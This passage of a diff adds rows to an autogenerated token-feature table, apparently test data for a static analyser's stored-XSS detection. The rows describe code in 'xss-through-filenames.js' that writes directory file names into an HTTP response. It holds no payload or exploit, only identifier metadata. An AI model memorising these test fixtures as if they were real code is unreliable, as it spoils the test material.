    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | this | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:26 | files2 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:26 | files2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:26 | files2 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:26 | files2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:26 | files2 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | 'arguments' object of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | exceptional return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | exceptional return of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | exceptional return of anonymous function | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | functio ... \\n\\n } | CalleeFlexibleAccessPath | fs.readdir | | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | functio ... \\n\\n } | InputArgumentIndex | 1 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | functio ... \\n\\n } | calleeImports | fs | @@ -22460,6 +149101,51 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | functio ... \\n\\n } | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | functio ... \\n\\n } | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | functio ... \\n\\n } | receiverName | fs | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | return of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:39:5 | return of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:36:25:40 | error | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:36:25:40 | error | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:36:25:40 | error | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:36:25:40 | error | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:36:25:40 | error | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:11 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:11 | res | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:11 | res | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:11 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:11 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:17 | res.write | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:17 | res.write | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:17 | res.write | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:17 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:17 | res.write | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:25 | exceptional return of res.write(files1) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:25 | exceptional return of res.write(files1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:25 | exceptional return of res.write(files1) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:25 | exceptional return of res.write(files1) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:25 | exceptional return of res.write(files1) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:25 | res.write(files1) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:25 | res.write(files1) | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:25 | res.write(files1) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:25 | res.write(files1) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:9:26:25 | res.write(files1) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:13:26:17 | write | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:13:26:17 | write | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:13:26:17 | write | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:13:26:17 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:26:13:26:17 | write | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:26:19:26:24 | files1 | CalleeFlexibleAccessPath | res.write | | autogenerated/Xss/StoredXss/xss-through-filenames.js:26:19:26:24 | files1 | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:26:19:26:24 | files1 | contextFunctionInterfaces | format(files2) | @@ -22468,6 +149154,89 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:26:19:26:24 | files1 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:26:19:26:24 | files1 | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:26:19:26:24 | files1 | receiverName | res | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:13:28:16 | dirs | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:13:28:16 | dirs | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:13:28:16 | dirs | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:13:28:16 | dirs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:13:28:16 | dirs | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:13:28:21 | dirs = [] | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:13:28:21 | dirs = [] | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:13:28:21 | dirs = [] | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:13:28:21 | dirs = [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:13:28:21 | dirs = [] | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:20:28:21 | [] | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:20:28:21 | [] | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:20:28:21 | [] | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:20:28:21 | [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:28:20:28:21 | [] | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:18 | files2 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:18 | files2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:18 | files2 | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:18 | files2 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:18 | files2 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:18 | files2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:18 | files2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:18 | files2 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 = [] | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 = [] | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 = [] | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 = [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 = [] | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:22:29:23 | [] | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:22:29:23 | [] | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:22:29:23 | [] | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:22:29:23 | [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:29:22:29:23 | [] | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:14 | files1 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:14 | files1 | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:14 | files1 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:14 | files1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:14 | files1 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:22 | files1.forEach | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:22 | files1.forEach | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:22 | files1.forEach | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:22 | files1.forEach | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:22 | files1.forEach | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:32:10 | exceptional return of files1. ... }) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:32:10 | exceptional return of files1. ... }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:32:10 | exceptional return of files1. ... }) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:32:10 | exceptional return of files1. ... }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:32:10 | exceptional return of files1. ... }) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:32:10 | files1. ... }) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:32:10 | files1. ... }) | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:32:10 | files1. ... }) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:32:10 | files1. ... }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:32:10 | files1. ... }) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:16:30:22 | forEach | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:16:30:22 | forEach | contextSurroundingFunctionParameters | (req, res)\n(error, files1) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:16:30:22 | forEach | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:16:30:22 | forEach | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:16:30:22 | forEach | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | files2 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | files2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | files2 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | files2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | files2 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | this | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | this | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | this | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | 'arguments' object of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | 'arguments' object of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | 'arguments' object of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | exceptional return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | exceptional return of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | exceptional return of anonymous function | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | functio ... } | CalleeFlexibleAccessPath | files1.forEach | | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | functio ... } | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | functio ... } | contextFunctionInterfaces | format(files2) | @@ -22476,6 +149245,46 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | functio ... } | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | functio ... } | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | functio ... } | receiverName | files1 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | return of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:32:9 | return of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file | contextSurroundingFunctionParameters | (req, res)\n(error, files1)\n(file) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:18 | files2 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:18 | files2 | contextSurroundingFunctionParameters | (req, res)\n(error, files1)\n(file) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:18 | files2 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:18 | files2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:18 | files2 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:23 | files2.push | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:23 | files2.push | contextSurroundingFunctionParameters | (req, res)\n(error, files1)\n(file) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:23 | files2.push | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:23 | files2.push | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:23 | files2.push | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:29 | exceptional return of files2.push(file) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:29 | exceptional return of files2.push(file) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:29 | exceptional return of files2.push(file) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
